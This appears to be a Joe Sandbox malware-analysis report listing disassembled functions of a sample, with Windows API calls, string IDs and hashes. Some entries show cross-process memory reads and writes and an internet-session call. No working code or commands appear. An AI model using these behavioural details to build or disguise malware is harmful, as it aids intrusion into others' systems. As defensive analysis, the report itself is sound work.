                                                    Function 006B28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2911
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B294C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: c0aee85748171f6cbcd0da94986fff6a8be89e56e4b541ba99f9f068de6c4ab1
                                                    • Instruction ID: 8a72643aec5b70e07cf2a190c23dda17d93e1e43df7a6983daa7ba7d24be03ac
                                                    • Opcode Fuzzy Hash: c0aee85748171f6cbcd0da94986fff6a8be89e56e4b541ba99f9f068de6c4ab1
                                                    • Instruction Fuzzy Hash: 3131F7B1900307DFEB24EF49C845BEEBBF6EF45350F144019E989A62A1D77099C5CB51
                                                    Function 006516DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetParent.USER32(?), ref: 0068B7BA
                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,006519B3,?,?,?,00000006,?), ref: 0068B834
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$ParentProc
                                                    • String ID: hW
                                                    • API String ID: 2181805148-1300829777
                                                    • Opcode ID: faba56383e5d0dbd4ad20460e194219f5063ea5da07d40d2d5ed524f9a51b208
                                                    • Instruction ID: 7ab786e0fe181ed3188f698019e495ee85e6483b5a3874a558369053ceae6d6c
                                                    • Opcode Fuzzy Hash: faba56383e5d0dbd4ad20460e194219f5063ea5da07d40d2d5ed524f9a51b208
                                                    • Instruction Fuzzy Hash: 72219E34201504AFCB249B2CC885EE93BA7AF4E321F584264F9255F3F2C7319E56DB50
                                                    Function 006AA9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0066603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00666051
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006AAA10
                                                    • _strlen.LIBCMT ref: 006AAA1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout_strlen
                                                    • String ID: @U=u
                                                    • API String ID: 2777139624-2594219639
                                                    • Opcode ID: 2a4c6e377a2a90883dbcf5b9c628f3e93712095f45f9a394adb0409a1d6ce6eb
                                                    • Instruction ID: 5774d4909e4638a9fece646b71351495b7561cc4fa7c5650a73cfcfff8ac5b80
                                                    • Opcode Fuzzy Hash: 2a4c6e377a2a90883dbcf5b9c628f3e93712095f45f9a394adb0409a1d6ce6eb
                                                    • Instruction Fuzzy Hash: 8911083220020666CB54BEB8D9829FF77AB9F4A300F00506FFA06CA293DF258C45CA59
                                                    Function 006D6865 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B55FD: GetLocalTime.KERNEL32 ref: 006B560A
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B563F
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B5671
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B56A4
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B56E6
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D68FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalMessageSendTime
                                                    • String ID: @U=u$SysDateTimePick32
                                                    • API String ID: 2466184910-2530228043
                                                    • Opcode ID: f054e947744ba35143e7ee374585af32d61bfac1007240860543b5467eda9057
                                                    • Instruction ID: 803de11a1d1d1d172956f54bb50452299a284ad035cb106481505bf550d28329
                                                    • Opcode Fuzzy Hash: f054e947744ba35143e7ee374585af32d61bfac1007240860543b5467eda9057
                                                    • Instruction Fuzzy Hash: D3210671B40209AFEF219E14DC82FEA73ABEB44760F20451AF950AB3D0D6B5AC819760
                                                    Function 006A9225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A923E
                                                      • Part of subcall function 006B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006B1409
                                                      • Part of subcall function 006B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B1419
                                                      • Part of subcall function 006B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B142F
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 006A92A5
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @U=u
                                                    • API String ID: 1045663743-2594219639
                                                    • Opcode ID: e8c1f6c8fce20a70f45d705aa1e8b6843d3de29cccd2fd6a54a658b98d21da65
                                                    • Instruction ID: cd5683cd4f05fd3ef535ff0c1b6ecc9151830b4ed9fb3b5f53472219ffa6295f
                                                    • Opcode Fuzzy Hash: e8c1f6c8fce20a70f45d705aa1e8b6843d3de29cccd2fd6a54a658b98d21da65
                                                    • Instruction Fuzzy Hash: 6E215171902118BBDF51ABA4DC81FDDBBB5FF0A310F1041A9F548A7191DA705E84CFA4
                                                    Function 006D66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006D6761
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D676C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 139c1596cf0627ff972da2e989d3aac06975598f22d6f8e77cbec034faac6f37
                                                    • Instruction ID: 33e3cdcfd6df62d10c4219d6f0c0d8b7efc77ac52e0c743199aef06915aeb7d1
                                                    • Opcode Fuzzy Hash: 139c1596cf0627ff972da2e989d3aac06975598f22d6f8e77cbec034faac6f37
                                                    • Instruction Fuzzy Hash: A311B271B00208AFEF11CF54CC81EEB376BEB883A8F10422AF91497391D675DC5187A0
                                                    Function 006D6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 006D6C71
                                                    • GetSysColor.USER32(00000012), ref: 006D6C8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 1beba49ed4bb60fd375aa62d53dabefacb5a1865937b9dfc1a2d05360407818d
                                                    • Instruction ID: 60b8e6ca34e4cb96453b794dd7964b8402ef7a89cbc0c0f2dd674fe4b7e122d7
                                                    • Opcode Fuzzy Hash: 1beba49ed4bb60fd375aa62d53dabefacb5a1865937b9dfc1a2d05360407818d
                                                    • Instruction Fuzzy Hash: 3D211772A20209AFDB04DFA8CC45EEA7BA9FB08315F01462AF995D2250D635E8519B60
                                                    Function 006D678B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateMenuPopup
                                                    • String ID: hW
                                                    • API String ID: 3826294624-1300829777
                                                    • Opcode ID: 891cadc90025de4f9168ec7027a2a848ba6e899944856757d9cf2f46dc6ecccf
                                                    • Instruction ID: 43d73bede3c3e4d6bf2d1b31112d3474a7f2dc2df0e90119e655433aa6af759b
                                                    • Opcode Fuzzy Hash: 891cadc90025de4f9168ec7027a2a848ba6e899944856757d9cf2f46dc6ecccf
                                                    • Instruction Fuzzy Hash: EF215C78900609DFCB24CF28D444BD677F2FB8A324F49856AE85A8B391C331AC56DF61
                                                    Function 006B29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2A22
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006B2A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 11aa42b0d631d193dc21d11881d4d0b8cb7a5557a75521fc68270878bf7c0f04
                                                    • Instruction ID: f362e07e655105080f291c99b550dea2dcf3cfdf64a92a4a3af3c35c563c23a2
                                                    • Opcode Fuzzy Hash: 11aa42b0d631d193dc21d11881d4d0b8cb7a5557a75521fc68270878bf7c0f04
                                                    • Instruction Fuzzy Hash: 5F11E6B2D01116EBCB34EB58DC54BDA77FAAB85300F048021E955E7390D730AD86C795
                                                    Function 006C21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006C222C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006C2255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 77c1dfffcdc6e10066de6a1daad7b6bd2d8981918762a54a0aa6032300e36c38
                                                    • Instruction ID: 36d4f2ca712dc59c9a9fa71b021a27d55bc811372834a47c932eb3faa858efc2
                                                    • Opcode Fuzzy Hash: 77c1dfffcdc6e10066de6a1daad7b6bd2d8981918762a54a0aa6032300e36c38
                                                    • Instruction Fuzzy Hash: A711E0B0501226BADB248F118CA8FFBFBAAFF06361F10822EFE0546100D2745A81D6F0
                                                    Function 006D65B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 006D662C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u$button
                                                    • API String ID: 3850602802-1762282863
                                                    • Opcode ID: a5579b47180994f318b3a93da8bc96b86b520335a3b1dc47a5e89670344c200e
                                                    • Instruction ID: 9dedb84067016df8c3d3b19b96bbcea314582c0f8536203d86a133e7db9e181f
                                                    • Opcode Fuzzy Hash: a5579b47180994f318b3a93da8bc96b86b520335a3b1dc47a5e89670344c200e
                                                    • Instruction Fuzzy Hash: 9311E172240205ABDF118F60DC11FEA376BEF58314F154219FA51A72D0C776EC929B50
                                                    Function 006D788C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000133E,00000000,?), ref: 006D78D8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: 5ae0d58ede84b0e71c697cbf2f0ae8e0db81a545ba982e41648464b6307c96d3
                                                    • Instruction ID: 262189aea3055dfbb0497da80ab0b663b5cbd7117fc63b2da18ffab1754c7e11
                                                    • Opcode Fuzzy Hash: 5ae0d58ede84b0e71c697cbf2f0ae8e0db81a545ba982e41648464b6307c96d3
                                                    • Instruction Fuzzy Hash: 1E11E631904744AFD721CF34C8A1AE7B7EAFF05310F50851EE8AA4B391EB716941DB60
                                                    Function 006A94A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,0000102B,?,00000000), ref: 006A9509
                                                    • SendMessageW.USER32(?,0000102B,?,00000000), ref: 006A952E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MemoryProcessWrite
                                                    • String ID: @U=u
                                                    • API String ID: 1195347164-2594219639
                                                    • Opcode ID: 530604f613c2014d825ff75ce999c33edf1636ab1ac74644d9d90faf44e3e8d7
                                                    • Instruction ID: a97c8721cd13aaa9d081f0f8d3ac07ce2cc11d56a5e8e10b8aa8d13b62b053a8
                                                    • Opcode Fuzzy Hash: 530604f613c2014d825ff75ce999c33edf1636ab1ac74644d9d90faf44e3e8d7
                                                    • Instruction Fuzzy Hash: 26012B32901118BBDB11AF68DC46EEEBB79DB05310F10416EF915A71D1DB706D95CFA0
                                                    Function 00652327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: hW
                                                    • API String ID: 0-1300829777
                                                    • Opcode ID: 9aa95378242e3838fb5369dcd9705b28c2038387c95afe2e5c84f488a2426d76
                                                    • Instruction ID: a049f051c76b1ed5db1e9d185d5e895adbeb346d32fe10c441325f6a1c9bb67c
                                                    • Opcode Fuzzy Hash: 9aa95378242e3838fb5369dcd9705b28c2038387c95afe2e5c84f488a2426d76
                                                    • Instruction Fuzzy Hash: 9A111634600604EFCB24AF28C841AA57BE6BB89320F148259EA699B3A0C771E945CF90
                                                    Function 006A95D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 006A95FB
                                                    • SendMessageW.USER32(?,0000040D,?,00000000), ref: 006A962E
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MemoryProcessRead_memmove
                                                    • String ID: @U=u
                                                    • API String ID: 339422723-2594219639
                                                    • Opcode ID: 48b233d9a7426c755f2aa886dd769fb588390f7df81cc6b9630dd98d28beda23
                                                    • Instruction ID: 3986f45125a215197ddd315b87cc92b00fefc6ce64817e1744235c6caaa8bb9e
                                                    • Opcode Fuzzy Hash: 48b233d9a7426c755f2aa886dd769fb588390f7df81cc6b9630dd98d28beda23
                                                    • Instruction Fuzzy Hash: F1015B71801118AFDB90AF54DC91ED977ADEB15340F80C0AAB64996151DE314E89CF94
                                                    Function 006AC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006AC534
                                                      • Part of subcall function 006AC816: _memmove.LIBCMT ref: 006AC860
                                                      • Part of subcall function 006AC816: VariantInit.OLEAUT32(00000000), ref: 006AC882
                                                      • Part of subcall function 006AC816: VariantCopy.OLEAUT32(00000000,?), ref: 006AC88C
                                                    • VariantClear.OLEAUT32(?), ref: 006AC556
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                    • String ID: d}p
                                                    • API String ID: 2932060187-2047593577
                                                    • Opcode ID: 3ce53d165323b04d2cdbfd234b503601f65e7500c09068b23cae95d2dd023d41
                                                    • Instruction ID: 7311af2760430a6fc795ca3a43783c6c7bc5961f493c396e33cc5367813a9a8b
                                                    • Opcode Fuzzy Hash: 3ce53d165323b04d2cdbfd234b503601f65e7500c09068b23cae95d2dd023d41
